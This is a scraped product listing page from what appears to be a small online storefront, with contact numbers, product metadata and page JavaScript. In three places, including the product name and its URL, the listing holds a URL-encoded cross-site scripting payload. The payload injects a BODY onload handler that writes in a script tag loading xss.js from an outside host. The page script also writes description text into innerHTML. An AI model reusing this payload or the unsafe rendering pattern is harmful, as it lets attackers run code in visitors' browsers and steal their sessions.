Madgaon
+919111111190
8383383838

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

", "name": "%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E", "image": "https://bizimages.withfloats.com/actual/9a713abdcca54ac3aa4675f932d81261.jpg", "offers": { "@type": "Offer", "url": "http://662f42c8825a323c150f5efa.preview.boostkit.dev/products/22-3e-3cbody-20onload-document-write-22-3cs-22-2b-22cript-20src-http-my-box-com-xss-js-3e-3c-script-3e-22-3e/1062", "availability": "http://schema.org/instock", "price": "0", "priceCurrency": "INR" } }
Goods by asdasd

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

`; // Regex jo URLs ko detect kare, example: 9yardsmadisar.com, www.example.com, https://something.com const urlRegex = /(\b(https?:\/\/|www\.)?[-a-z0-9+&@#\/%?=~_|!:,.;]*\.[a-z]{2,6}\b([-a-z0-9+&@#\/%=~_|!:,.;]*))/gi; // Replace plain URLs with anchor tags having class and target _blank const replacedText = descCont.replace(urlRegex, function(url) { let href = url; // Agar url http ya https se start nahi ho raha to http add karo if (!href.match(/^https?:\/\//i)) { href = 'http://' + href; } return `${url}`; }); prdesc.innerHTML = replacedText.replace(/\n/g, '
'); } // Remove any old half-width classes buttons.forEach(btn => btn.classList.remove('half-width')); if (buttons.length === 2) { buttons.forEach(btn => btn.classList.add('half-width')); } else if (buttons.length === 3) { buttons[0].classList.add('half-width'); buttons[1].classList.add('half-width'); // buttons[2] remains full-width } // For 1 or >3 buttons, they remain full width const detailCart="True"; const detailEnquiry=document.getElementById("details-enquiry"); const uniquepaymentBtn="uniquepaymenturl"; if((detailCart.toLowerCase()=="false") && (uniquepaymentBtn == 'assuredpurchase')){ detailEnquiry.classList.remove('text-white'); detailEnquiry.classList.remove('color-primary'); detailEnquiry.classList.add('outline-primary'); detailEnquiry.classList.add('text-theme'); detailEnquiry.classList.add('addCartBtn'); } });